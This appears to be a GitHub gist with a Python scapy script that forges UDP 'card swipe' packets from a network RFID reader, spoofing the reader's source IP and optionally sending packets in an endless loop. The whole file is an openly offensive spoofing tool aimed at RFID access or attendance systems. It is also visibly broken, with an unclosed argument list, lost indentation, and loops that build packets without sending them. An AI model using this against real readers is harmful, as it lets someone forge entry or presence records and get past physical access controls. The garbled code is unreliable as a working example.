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Last active December 30, 2015 06:09
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Save flyte/7787387 to your computer and use it in GitHub Desktop.
Fake a "swipe" UDP packet from a network based RFID reader by spoofing the source IP.
from collections import OrderedDict
import argparse
import logging
# Suppress ipv6 warning when importing scapy
from scapy.all import IP, UDP, send, L3RawSocket, conf
PACKET_FORMAT = "tag=%s&%s&seq=0x%04x"
# Set up argument parser
p = argparse.ArgumentParser()
args = OrderedDict([
("rfid_tag", {"help": "The RFID tag to send eg. abcdef12345678"}),
("--dest_ip", {"help": "Destination IP - defaults to broadcast", "default": ""}),
("--source_ip", {
"help": "The IP to pretend to be when sending the swipe - defaults to own IP",
"default": None}),
("--direction", {
"help": "'in' or 'out' means RFID card presented, or taken away",
"choices": ("in", "out"), "default": "in"}),
("--seq_number", {"help": "Sequence number to start on", "default": 1, "type": int}),
("--port", {"help": "Destination port", "default": 11000, "type": int}),
("--count", {"help": "How many packets to send", "default": 1, "type": int}),
("--loop", {"help": "Send forever", "action": "store_true"}),
("--incr_seq", {"help": "Increment the seq number on each packet", "action": "store_true"})
for arg, opts in args.items():
p.add_argument(arg, **opts)
if __name__ == "__main__":
args = p.parse_args()
count = 0
if args.dest_ip in ("", "localhost"):
conf.L3socket = L3RawSocket
ip = IP(dst=args.dest_ip)
if args.source_ip is not None:
ip.src = args.source_ip
udp = UDP(dport=args.port)
if args.incr_seq:
seq = args.seq_number
if args.loop:
while True:
pkt = ip/udp/(
PACKET_FORMAT % (args.rfid_tag, args.direction, seq))
count += 1
seq += 1
i = 0
while i < args.count:
pkt = ip/udp/(
PACKET_FORMAT % (args.rfid_tag, args.direction, seq))
count += 1
seq += 1
i += 1
pkt = ip/udp/(
PACKET_FORMAT % (args.rfid_tag, args.direction, args.seq_number))
if args.loop:
send(pkt, loop=args.loop)
count = -1
send(pkt, count=args.count)
count = -1
if count > -1:
print "Sent %d packets." % count
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